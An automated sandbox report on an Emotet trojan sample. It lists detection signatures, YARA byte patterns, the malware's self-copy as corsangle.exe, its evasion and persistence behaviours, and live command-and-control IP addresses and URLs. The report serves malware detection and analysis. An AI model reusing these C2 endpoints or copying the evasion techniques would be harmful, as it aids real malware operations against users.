Joe Sandbox Cloud Basic Analysis Report

Loading ...

Play interactive tourEdit tour

Analysis Report lK8vF3n2e7.exe

Overview

General Information

Sample Name:lK8vF3n2e7.exe
Analysis ID:383022
MD5:d7cd602eb9e9ad8272d4ad0910815835
SHA1:cefae0fd990a5491e893796ab8ab56fc9edc015b
SHA256:bca575b21c8b02010cde26b2bd7b2e8cdc313f135f97363b34f8bf0f389a990b
Infos:

Most interesting Screenshot:

Detection

Emotet
Score:96
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Detected Emotet e-Banking trojan
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Yara detected Emotet
Changes security center settings (notifications, updates, antivirus, firewall)
Drops executables to the windows directory (C:\Windows) and starts them
Found evasive API chain (may stop execution after checking mutex)
Hides that the sample has been downloaded from the Internet (zone.identifier)
AV process strings found (often used to terminate AV products)
Antivirus or Machine Learning detection for unpacked file
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains capabilities to detect virtual machines
Contains functionality to call native functions
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to delete services
Contains functionality to dynamically determine API calls
Contains functionality to enumerate running services
Contains functionality to launch a process as a different user
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates files inside the system directory
Deletes files inside the Windows folder
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files to the windows directory (C:\Windows)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains strange resources
Potential key logger detected (key state polling based)
Queries disk information (often used to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Tries to load missing DLLs
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Startup

  • System is w10x64
  • lK8vF3n2e7.exe (PID: 460 cmdline: 'C:\Users\user\Desktop\lK8vF3n2e7.exe' MD5: D7CD602EB9E9AD8272D4AD0910815835)
    • lK8vF3n2e7.exe (PID: 4144 cmdline: --b0af2bca MD5: D7CD602EB9E9AD8272D4AD0910815835)
  • svchost.exe (PID: 3708 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • corsangle.exe (PID: 6128 cmdline: C:\Windows\SysWOW64\corsangle.exe MD5: D7CD602EB9E9AD8272D4AD0910815835)
    • corsangle.exe (PID: 5496 cmdline: --2e5419fc MD5: D7CD602EB9E9AD8272D4AD0910815835)
  • svchost.exe (PID: 4280 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 1540 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 2440 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 244 cmdline: C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 2592 cmdline: c:\windows\system32\svchost.exe -k localservice -p -s CDPSvc MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 1140 cmdline: c:\windows\system32\svchost.exe -k unistacksvcgroup MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 6008 cmdline: c:\windows\system32\svchost.exe -k networkservice -p -s DoSvc MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 3012 cmdline: C:\Windows\System32\svchost.exe -k NetworkService -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • SgrmBroker.exe (PID: 5248 cmdline: C:\Windows\system32\SgrmBroker.exe MD5: D3170A3F3A9626597EEE1888686E3EA6)
  • svchost.exe (PID: 4276 cmdline: c:\windows\system32\svchost.exe -k localservicenetworkrestricted -p -s wscsvc MD5: 32569E403279B3FD2EDB7EBD036273FA)
    • MpCmdRun.exe (PID: 5836 cmdline: 'C:\Program Files\Windows Defender\mpcmdrun.exe' -wdenable MD5: A267555174BFA53844371226F482B86B)
      • conhost.exe (PID: 3892 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000002.00000002.233128075.0000000002221000.00000020.00000001.sdmpJoeSecurity_EmotetYara detected EmotetJoe Security
    00000002.00000002.233128075.0000000002221000.00000020.00000001.sdmpEmotetEmotet Payloadkevoreilly
    • 0xfad:$snippet2: 6A 13 68 01 00 01 00 FF 15 D8 1B 23 02 85 C0
    • 0x5066:$snippet6: 33 C0 21 05 0C 3C 23 02 A3 08 3C 23 02 39 05 60 03 23 02 74 18 40 A3 08 3C 23 02 83 3C C5 60 03 ...
    00000004.00000002.456108284.0000000000700000.00000040.00000001.sdmpJoeSecurity_EmotetYara detected EmotetJoe Security
      00000004.00000002.456108284.0000000000700000.00000040.00000001.sdmpEmotetEmotet Payloadkevoreilly
      • 0x18ec:$snippet2: 6A 13 68 01 00 01 00 FF 15 D8 1B 41 00 85 C0
      • 0x59a5:$snippet6: 33 C0 21 05 0C 3C 41 00 A3 08 3C 41 00 39 05 60 03 41 00 74 18 40 A3 08 3C 41 00 83 3C C5 60 03 ...
      00000000.00000002.194289287.0000000000591000.00000020.00000001.sdmpJoeSecurity_EmotetYara detected EmotetJoe Security
        Click to see the 11 entries

        Unpacked PEs

        SourceRuleDescriptionAuthorStrings
        4.2.corsangle.exe.70053f.1.unpackMAL_Emotet_Jan20_1Detects Emotet malwareFlorian Roth
        • 0x2577:$op1: 03 FE 66 39 07 0F 85 2A FF FF FF 8B 4D F0 6A 20
        • 0x255d:$op2: 8B 7D FC 0F 85 49 FF FF FF 85 DB 0F 84 D1
        4.2.corsangle.exe.70053f.1.unpackJoeSecurity_EmotetYara detected EmotetJoe Security
          4.2.corsangle.exe.70053f.1.unpackEmotetEmotet Payloadkevoreilly
          • 0x7ad:$snippet2: 6A 13 68 01 00 01 00 FF 15 D8 1B 41 00 85 C0
          • 0x4866:$snippet6: 33 C0 21 05 0C 3C 41 00 A3 08 3C 41 00 39 05 60 03 41 00 74 18 40 A3 08 3C 41 00 83 3C C5 60 03 ...
          3.2.corsangle.exe.e3053f.1.raw.unpackMAL_Emotet_Jan20_1Detects Emotet malwareFlorian Roth
          • 0x3177:$op1: 03 FE 66 39 07 0F 85 2A FF FF FF 8B 4D F0 6A 20
          • 0x315d:$op2: 8B 7D FC 0F 85 49 FF FF FF 85 DB 0F 84 D1
          3.2.corsangle.exe.e3053f.1.raw.unpackJoeSecurity_EmotetYara detected EmotetJoe Security
            Click to see the 23 entries

            Sigma Overview

            No Sigma rule has matched

            Signature Overview

            Click to jump to signature section

            Show All Signature Results

            AV Detection:

            barindex
            Antivirus / Scanner detection for submitted sampleShow sources
            Source: lK8vF3n2e7.exeAvira: detected
            Multi AV Scanner detection for submitted fileShow sources
            Source: lK8vF3n2e7.exeVirustotal: Detection: 71%Perma Link
            Source: lK8vF3n2e7.exeReversingLabs: Detection: 90%
            Source: 0.0.lK8vF3n2e7.exe.400000.0.unpackAvira: Label: TR/AD.Emotet.dzjt
            Source: 2.0.lK8vF3n2e7.exe.400000.0.unpackAvira: Label: TR/AD.Emotet.dzjt
            Source: 3.0.corsangle.exe.400000.0.unpackAvira: Label: TR/AD.Emotet.dzjt
            Source: 4.0.corsangle.exe.400000.0.unpackAvira: Label: TR/AD.Emotet.dzjt
            Source: C:\Users\user\Desktop\lK8vF3n2e7.exeCode function: 2_2_0222207B CryptDuplicateHash,CryptEncrypt,CryptDestroyHash,2_2_0222207B
            Source: C:\Users\user\Desktop\lK8vF3n2e7.exeCode function: 2_2_0222215A CryptDuplicateHash,CryptDecrypt,CryptVerifySignatureW,CryptDestroyHash,2_2_0222215A
            Source: C:\Users\user\Desktop\lK8vF3n2e7.exeCode function: 2_2_02221F11 CryptExportKey,2_2_02221F11
            Source: C:\Users\user\Desktop\lK8vF3n2e7.exeCode function: 2_2_02221F75 CryptAcquireContextW,CryptImportKey,LocalFree,CryptReleaseContext,2_2_02221F75
            Source: C:\Users\user\Desktop\lK8vF3n2e7.exeCode function: 2_2_02221F56 CryptGetHashParam,2_2_02221F56
            Source: C:\Users\user\Desktop\lK8vF3n2e7.exeCode function: 2_2_02221FFC CryptGenKey,CryptCreateHash,CryptDestroyKey,CryptDestroyKey,CryptReleaseContext,2_2_02221FFC
            Source: lK8vF3n2e7.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
            Source: C:\Users\user\Desktop\lK8vF3n2e7.exeCode function: 0_2_004290C4 __EH_prolog,GetFullPathNameA,lstrcpynA,PathIsUNCA,GetVolumeInformationA,CharUpperA,FindFirstFileA,FindClose,lstrlenA,lstrcpyA,0_2_004290C4
            Source: C:\Users\user\Desktop\lK8vF3n2e7.exeCode function: 2_2_004290C4 __EH_prolog,GetFullPathNameA,lstrcpynA,PathIsUNCA,GetVolumeInformationA,CharUpperA,FindFirstFileA,FindClose,lstrlenA,lstrcpyA,2_2_004290C4
            Source: global trafficTCP traffic: 192.168.2.3:49729 -> 104.236.137.72:8080
            Source: global trafficTCP traffic: 192.168.2.3:49740 -> 213.189.36.51:8080
            Source: global trafficTCP traffic: 192.168.2.3:49741 -> 85.234.143.94:8080
            Source: global trafficTCP traffic: 192.168.2.3:49744 -> 119.59.124.163:8080
            Source: global trafficTCP traffic: 192.168.2.3:49745 -> 190.146.131.105:8080
            Source: Joe Sandbox ViewIP Address: 119.59.124.163 119.59.124.163
            Source: unknownTCP traffic detected without corresponding DNS query: 104.236.137.72
            Source: unknownTCP traffic detected without corresponding DNS query: 104.236.137.72
            Source: unknownTCP traffic detected without corresponding DNS query: 104.236.137.72
            Source: unknownTCP traffic detected without corresponding DNS query: 172.104.233.225
            Source: unknownTCP traffic detected without corresponding DNS query: 172.104.233.225
            Source: unknownTCP traffic detected without corresponding DNS query: 172.104.233.225
            Source: unknownTCP traffic detected without corresponding DNS query: 213.189.36.51
            Source: unknownTCP traffic detected without corresponding DNS query: 213.189.36.51
            Source: unknownTCP traffic detected without corresponding DNS query: 213.189.36.51
            Source: unknownTCP traffic detected without corresponding DNS query: 85.234.143.94
            Source: unknownTCP traffic detected without corresponding DNS query: 85.234.143.94
            Source: unknownTCP traffic detected without corresponding DNS query: 85.234.143.94
            Source: unknownTCP traffic detected without corresponding DNS query: 119.59.124.163
            Source: unknownTCP traffic detected without corresponding DNS query: 119.59.124.163
            Source: unknownTCP traffic detected without corresponding DNS query: 119.59.124.163
            Source: unknownTCP traffic detected without corresponding DNS query: 190.146.131.105
            Source: unknownTCP traffic detected without corresponding DNS query: 190.146.131.105
            Source: unknownTCP traffic detected without corresponding DNS query: 190.146.131.105
            Source: corsangle.exe, 00000004.00000002.456309381.00000000007B9000.00000004.00000020.sdmpString found in binary or memory: http://104.236.137.72:8080/NuFfY0fKFWZKA4NUbs
            Source: corsangle.exe, 00000004.00000002.456309381.00000000007B9000.00000004.00000020.sdmpString found in binary or memory: http://104.236.137.72:8080/NuFfY0fKFWZKA4NUbs$
            Source: corsangle.exe, 00000004.00000002.456309381.00000000007B9000.00000004.00000020.sdmpString found in binary or memory: http://104.236.137.72:8080/NuFfY0fKFWZKA4NUbsI
            Source: corsangle.exe, 00000004.00000002.456309381.00000000007B9000.00000004.00000020.sdmpString found in binary or memory: http://104.236.137.72:8080/NuFfY0fKFWZKA4NUbsT
            Source: corsangle.exe, 00000004.00000002.456309381.00000000007B9000.00000004.00000020.sdmpString found in binary or memory: http://119.59.124.163:8080/7gWpLeeuBCj
            Source: corsangle.exe, 00000004.00000002.456309381.00000000007B9000.00000004.00000020.sdmpString found in binary or memory: http://119.59.124.163:8080/7gWpLeeuBCjW
            Source: corsangle.exe, 00000004.00000003.359738057.00000000007E3000.00000004.00000001.sdmpString found in binary or memory: http://172.104.233.225:8080/coIxQuMWPxi
            Source: corsangle.exe, 00000004.00000002.454210782.0000000000199000.00000004.00000001.sdmp, corsangle.exe, 00000004.00000002.456309381.00000000007B9000.00000004.00000020.sdmpString found in binary or memory: http://190.146.131.105/K1dG1qa5hXkSLaRnHQw
            Source: corsangle.exe, 00000004.00000002.456309381.00000000007B9000.00000004.00000020.sdmpString found in binary or memory: http://190.146.131.105/K1dG1qa5hXkSLaRnHQww
            Source: corsangle.exe, 00000004.00000002.456309381.00000000007B9000.00000004.00000020.sdmpString found in binary or memory: http://190.146.131.105:8080/K1dG1qa5hXkSLaRnHQw
            Source: corsangle.exe, 00000004.00000002.456309381.00000000007B9000.00000004.00000020.sdmpString found in binary or memory: http://190.146.131.105:8080/K1dG1qa5hXkSLaRnHQw80/7gWpLeeuBCj
            Source: corsangle.exe, 00000004.00000002.456309381.00000000007B9000.00000004.00000020.sdmpString found in binary or memory: http://190.146.131.105:8080/K1dG1qa5hXkSLaRnHQws
            Source: corsangle.exe, 00000004.00000002.456309381.00000000007B9000.00000004.00000020.sdmpString found in binary or memory: http://190.146.131.105:8080/K1dG1qa5hXkSLaRnHQw~
            Source: corsangle.exe, 00000004.00000003.359738057.00000000007E3000.00000004.00000001.sdmpString found in binary or memory: http://213.189.36.51/u0gALfm0zDZMJ
            Source: corsangle.exe, 00000004.00000003.359738057.00000000007E3000.00000004.00000001.sdmpString found in binary or memory: http://213.189.36.51:8080/u0gALfm0zDZMJ
            Source: corsangle.exe, 00000004.00000003.359738057.00000000007E3000.00000004.00000001.sdmpString found in binary or memory: http://213.189.36.51:8080/u0gALfm0zDZMJ4
            Source: corsangle.exe, 00000004.00000003.359738057.00000000007E3000.00000004.00000001.sdmpString found in binary or memory: http://213.189.36.51:8080/u0gALfm0zDZMJW
            Source: corsangle.exe, 00000004.00000003.359738057.00000000007E3000.00000004.00000001.sdmpString found in binary or memory: http://213.189.36.51:8080/u0gALfm0zDZMJm32
            Source: corsangle.exe, 00000004.00000002.456309381.00000000007B9000.00000004.00000020.sdmpString found in binary or memory: http://85.234.143.94:8080/hroFtzD6dRMJ
            Source: corsangle.exe, 00000004.00000002.456309381.00000000007B9000.00000004.00000020.sdmpString found in binary or memory: http://85.234.143.94:8080/hroFtzD6dRMJ4
            Source: corsangle.exe, 00000004.00000002.456309381.00000000007B9000.00000004.00000020.sdmpString found in binary or memory: http://85.234.143.94:8080/hroFtzD6dRh
            Source: corsangle.exe, 00000004.00000002.456309381.00000000007B9000.00000004.00000020.sdmpString found in binary or memory: http://85.234.143.94:8080/hroFtzD6dRxi
            Source: svchost.exe, 00000009.00000002.459340968.0000026126C16000.00000004.00000001.sdmpString found in binary or memory: http://crl3.digicert.com/Omniroot2025.crl0
            Source: svchost.exe, 00000009.00000002.459340968.0000026126C16000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.digicert.com0:
            Source: svchost.exe, 00000009.00000002.459340968.0000026126C16000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.msocsp.com0
            Source: svchost.exe, 00000009.00000002.455590105.000002612149F000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/0
            Source: svchost.exe, 00000009.00000002.459027918.0000026126B70000.00000002.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
            Source: svchost.exe, 00000011.00000002.309158276.000002B714A13000.00000004.00000001.sdmpString found in binary or memory: http://www.bingmapsportal.com
            Source: svchost.exe, 0000000E.00000002.455681474.000001B859242000.00000004.00000001.sdmpString found in binary or memory: https://%s.dnet.xboxlive.com
            Source: svchost.exe, 0000000E.00000002.455681474.000001B859242000.00000004.00000001.sdmpString found in binary or memory: https://%s.xboxlive.com
            Source: svchost.exe, 0000000E.00000002.455681474.000001B859242000.00000004.00000001.sdmpString found in binary or memory: https://activity.windows.com
            Source: svchost.exe, 00000011.00000003.308702175.000002B714A60000.00000004.00000001.sdmpString found in binary or memory: https://appexmapsappupdate.blob.core.windows.net
            Source: svchost.exe, 0000000E.00000002.455681474.000001B859242000.00000004.00000001.sdmpString found in binary or memory: https://bn2.notify.windows.com/v2/register/xplatform/device
            Source: svchost.exe, 0000000E.00000002.455681474.000001B859242000.00000004.00000001.sdmpString found in binary or memory: https://co4-df.notify.windows.com/v2/register/xplatform/device
            Source: svchost.exe, 00000011.00000003.308726736.000002B714A49000.00000004.00000001.sdmpString found in binary or memory: https://dev.ditu.live.com/REST/v1/Imagery/Copyright/
            Source: svchost.exe, 00000011.00000003.308702175.000002B714A60000.00000004.00000001.sdmpString found in binary or memory: https://dev.ditu.live.com/REST/v1/Locations
            Source: svchost.exe, 00000011.00000002.309206913.000002B714A3D000.00000004.00000001.sdmpString found in binary or memory: https://dev.ditu.live.com/REST/v1/Routes/
            Source: svchost.exe, 00000011.00000003.308702175.000002B714A60000.00000004.00000001.sdmpString found in binary or memory: https://dev.ditu.live.com/mapcontrol/logging.ashx
            Source: svchost.exe, 00000011.00000002.309238217.000002B714A52000.00000004.00000001.sdmpString found in binary or memory: https://dev.ditu.live.com/mapcontrol/mapconfiguration.ashx?name=native&v=
            Source: svchost.exe, 00000011.00000003.286829183.000002B714A31000.00000004.00000001.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Locations
            Source: svchost.exe, 00000011.00000002.309206913.000002B714A3D000.00000004.00000001.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/
            Source: svchost.exe, 00000011.00000003.308702175.000002B714A60000.00000004.00000001.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/Driving
            Source: svchost.exe, 00000011.00000003.308702175.000002B714A60000.00000004.00000001.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/Transit
            Source: svchost.exe, 00000011.00000003.308702175.000002B714A60000.00000004.00000001.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/Walking
            Source: svchost.exe, 00000011.00000003.308782224.000002B714A41000.00000004.00000001.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Transit/Schedules/
            Source: svchost.exe, 00000011.00000003.308782224.000002B714A41000.00000004.00000001.sdmpString found in binary or memory: https://dev.virtualearth.net/mapcontrol/HumanScaleServices/GetBubbles.ashx?n=
            Source: svchost.exe, 00000011.00000003.308702175.000002B714A60000.00000004.00000001.sdmpString found in binary or memory: https://dev.virtualearth.net/mapcontrol/logging.ashx
            Source: svchost.exe, 00000011.00000002.309251737.000002B714A5C000.00000004.00000001.sdmp, svchost.exe, 00000011.00000003.308754094.000002B714A40000.00000004.00000001.sdmpString found in binary or memory: https://dev.virtualearth.net/webservices/v1/LoggingService/LoggingService.svc/Log?
            Source: svchost.exe, 00000011.00000003.308726736.000002B714A49000.00000004.00000001.sdmpString found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gd?pv=1&r=
            Source: svchost.exe, 00000011.00000002.309251737.000002B714A5C000.00000004.00000001.sdmpString found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gdi?pv=1&r=
            Source: svchost.exe, 00000011.00000002.309251737.000002B714A5C000.00000004.00000001.sdmpString found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gdv?pv=1&r=
            Source: svchost.exe, 00000011.00000003.308726736.000002B714A49000.00000004.00000001.sdmpString found in binary or memory: https://dynamic.t
            Source: svchost.exe, 00000011.00000003.308702175.000002B714A60000.00000004.00000001.sdmpString found in binary or memory: https://dynamic.t0.tiles.ditu.live.com/comp/gen.ashx
            Source: svchost.exe, 00000011.00000002.309206913.000002B714A3D000.00000004.00000001.sdmpString found in binary or memory: https://ecn.dev.virtualearth.net/REST/v1/Imagery/Copyright/
            Source: svchost.exe, 00000011.00000003.286829183.000002B714A31000.00000004.00000001.sdmpString found in binary or memory: https://ecn.dev.virtualearth.net/mapcontrol/mapconfiguration.ashx?name=native&v=
            Source: svchost.exe, 00000011.00000002.309206913.000002B714A3D000.00000004.00000001.sdmpString found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/comp/gen.ashx
            Source: svchost.exe, 00000011.00000002.309158276.000002B714A13000.00000004.00000001.sdmp, svchost.exe, 00000011.00000002.309206913.000002B714A3D000.00000004.00000001.sdmpString found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gd?pv=1&r=
            Source: svchost.exe, 00000011.00000003.308754094.000002B714A40000.00000004.00000001.sdmpString found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gdi?pv=1&r=
            Source: svchost.exe, 00000011.00000003.308754094.000002B714A40000.00000004.00000001.sdmpString found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gdv?pv=1&r=
            Source: svchost.exe, 00000011.00000003.286829183.000002B714A31000.00000004.00000001.sdmpString found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gri?pv=1&r=
            Source: svchost.exe, 00000011.00000003.286829183.000002B714A31000.00000004.00000001.sdmpString found in binary or memory: https://t0.ssl.ak.tiles.virtualearth.net/tiles/gen
            Source: svchost.exe, 00000011.00000002.309238217.000002B714A52000.00000004.00000001.sdmpString found in binary or memory: https://t0.tiles.ditu.live.com/tiles/gen
            Source: C:\Users\user\Desktop\lK8vF3n2e7.exeCode function: 0_2_004267FF GetKeyState,GetKeyState,GetKeyState,GetKeyState,SendMessageA,0_2_004267FF
            Source: C:\Users\user\Desktop\lK8vF3n2e7.exeCode function: 2_2_004267FF GetKeyState,GetKeyState,GetKeyState,GetKeyState,SendMessageA,2_2_004267FF

            E-Banking Fraud:

            barindex
            Detected Emotet e-Banking trojanShow sources
            Source: C:\Users\user\Desktop\lK8vF3n2e7.exeCode function: 2_2_0222DE9C2_2_0222DE9C
            Yara detected EmotetShow sources
            Source: Yara matchFile source: 00000002.00000002.233128075.0000000002221000.00000020.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.456108284.0000000000700000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000002.194289287.0000000000591000.00000020.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.456134629.0000000000721000.00000020.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.233094123.00000000021E0000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.229558668.0000000000E30000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000002.194269122.0000000000570000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.229583434.0000000000E51000.00000020.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 4.2.corsangle.exe.70053f.1.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 3.2.corsangle.exe.e3053f.1.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 2.2.lK8vF3n2e7.exe.21e053f.1.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 3.2.corsangle.exe.e3053f.1.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.lK8vF3n2e7.exe.57053f.1.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 4.2.corsangle.exe.70053f.1.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 2.2.lK8vF3n2e7.exe.21e053f.1.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.lK8vF3n2e7.exe.57053f.1.raw.unpack, type: UNPACKEDPE
            Source: C:\Users\user\Desktop\lK8vF3n2e7.exeCode function: 2_2_02221F75 CryptAcquireContextW,CryptImportKey,LocalFree,CryptReleaseContext,2_2_02221F75

            System Summary:

            barindex
            Malicious sample detected (through community Yara rule)Show sources
            Source: 00000002.00000002.233128075.0000000002221000.00000020.00000001.sdmp, type: MEMORYMatched rule: Emotet Payload Author: kevoreilly
            Source: 00000004.00000002.456108284.0000000000700000.00000040.00000001.sdmp, type: MEMORYMatched rule: Emotet Payload Author: kevoreilly
            Source: 00000000.00000002.194289287.0000000000591000.00000020.00000001.sdmp, type: MEMORYMatched rule: Emotet Payload Author: kevoreilly
            Source: 00000004.00000002.456134629.0000000000721000.00000020.00000001.sdmp, type: MEMORYMatched rule: Emotet Payload Author: kevoreilly
            Source: 00000002.00000002.233094123.00000000021E0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Emotet Payload Author: kevoreilly
            Source: 00000003.00000002.229558668.0000000000E30000.00000040.00000001.sdmp, type: MEMORYMatched rule: Emotet Payload Author: kevoreilly
            Source: 00000000.00000002.194269122.0000000000570000.00000040.00000001.sdmp, type: MEMORYMatched rule: Emotet Payload Author: kevoreilly
            Source: 00000003.00000002.229583434.0000000000E51000.00000020.00000001.sdmp, type: MEMORYMatched rule: Emotet Payload Author: kevoreilly
            Source: 4.2.corsangle.exe.70053f.1.unpack, type: UNPACKEDPEMatched rule: Emotet Payload Author: kevoreilly
            Source: 3.2.corsangle.exe.e3053f.1.raw.unpack, type: UNPACKEDPEMatched rule: Emotet Payload Author: kevoreilly
            Source: 3.2.corsangle.exe.e3053f.1.raw.unpack, type: UNPACKEDPEMatched rule: Win32_Trojan_Emotet Author: ReversingLabs
            Source: 2.2.lK8vF3n2e7.exe.21e053f.1.unpack, type: UNPACKEDPEMatched rule: Emotet Payload Author: kevoreilly
            Source: 3.2.corsangle.exe.e3053f.1.unpack, type: UNPACKEDPEMatched rule: Emotet Payload Author: kevoreilly
            Source: 0.2.lK8vF3n2e7.exe.57053f.1.unpack, type: UNPACKEDPEMatched rule: Emotet Payload Author: kevoreilly
            Source: 4.2.corsangle.exe.70053f.1.raw.unpack, type: UNPACKEDPEMatched rule: Emotet Payload Author: kevoreilly
            Source: 4.2.corsangle.exe.70053f.1.raw.unpack, type: UNPACKEDPEMatched rule: Win32_Trojan_Emotet Author: ReversingLabs
            Source: 2.2.lK8vF3n2e7.exe.21e053f.1.raw.unpack, type: UNPACKEDPEMatched rule: Emotet Payload Author: kevoreilly
            Source: 2.2.lK8vF3n2e7.exe.21e053f.1.raw.unpack, type: UNPACKEDPEMatched rule: Win32_Trojan_Emotet Author: ReversingLabs
            Source: 0.2.lK8vF3n2e7.exe.57053f.1.raw.unpack, type: UNPACKEDPEMatched rule: Emotet Payload Author: kevoreilly
            Source: 0.2.lK8vF3n2e7.exe.57053f.1.raw.unpack, type: UNPACKEDPEMatched rule: Win32_Trojan_Emotet Author: ReversingLabs
            Source: C:\Users\user\Desktop\lK8vF3n2e7.exeCode function: 0_2_0040215A NtAllocateVirtualMemory,0_2_0040215A
            Source: C:\Users\user\Desktop\lK8vF3n2e7.exeCode function: 2_2_0040215A NtAllocateVirtualMemory,2_2_0040215A
            Source: C:\Users\user\Desktop\lK8vF3n2e7.exeCode function: 2_2_0222E068 GetModuleFileNameW,lstrlenW,OpenServiceW,DeleteService,CloseServiceHandle,2_2_0222E068
            Source: C:\Users\user\Desktop\lK8vF3n2e7.exeCode function: 2_2_02221D2B CreateProcessAsUserW,CreateProcessW,2_2_02221D2B
            Source: C:\Windows\SysWOW64\corsangle.exeFile created: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCacheJump to behavior
            Source: C:\Users\user\Desktop\lK8vF3n2e7.exeFile deleted: C:\Windows\SysWOW64\corsangle.exe:Zone.IdentifierJump to behavior
            Source: C:\Users\user\Desktop\lK8vF3n2e7.exeCode function: 0_2_004011170_2_00401117
            Source: C:\Users\user\Desktop\lK8vF3n2e7.exeCode function: 0_2_0042787E0_2_0042787E
            Source: C:\Users\user\Desktop\lK8vF3n2e7.exeCode function: 0_2_00412BF00_2_00412BF0
            Source: C:\Users\user\Desktop\lK8vF3n2e7.exeCode function: 0_2_00414EDC0_2_00414EDC
            Source: C:\Users\user\Desktop\lK8vF3n2e7.exeCode function: 0_2_0040EF2E0_2_0040EF2E
            Source: C:\Users\user\Desktop\lK8vF3n2e7.exeCode function: 2_2_004011172_2_00401117
            Source: C:\Users\user\Desktop\lK8vF3n2e7.exeCode function: 2_2_0042787E2_2_0042787E
            Source: C:\Users\user\Desktop\lK8vF3n2e7.exeCode function: 2_2_00412BF02_2_00412BF0
            Source: C:\Users\user\Desktop\lK8vF3n2e7.exeCode function: 2_2_00414EDC2_2_00414EDC
            Source: C:\Users\user\Desktop\lK8vF3n2e7.exeCode function: 2_2_0040EF2E2_2_0040EF2E
            Source: C:\Users\user\Desktop\lK8vF3n2e7.exeCode function: 2_2_021E30E82_2_021E30E8
            Source: C:\Users\user\Desktop\lK8vF3n2e7.exeCode function: 2_2_021E30E42_2_021E30E4
            Source: C:\Users\user\Desktop\lK8vF3n2e7.exeCode function: 2_2_021E28C12_2_021E28C1
            Source: C:\Users\user\Desktop\lK8vF3n2e7.exeCode function: 2_2_022237A52_2_022237A5
            Source: C:\Users\user\Desktop\lK8vF3n2e7.exeCode function: 2_2_022237A92_2_022237A9
            Source: C:\Users\user\Desktop\lK8vF3n2e7.exeCode function: 2_2_02222F822_2_02222F82
            Source: C:\Windows\SysWOW64\corsangle.exeCode function: 3_2_00E330E43_2_00E330E4
            Source: C:\Windows\SysWOW64\corsangle.exeCode function: 3_2_00E330E83_2_00E330E8
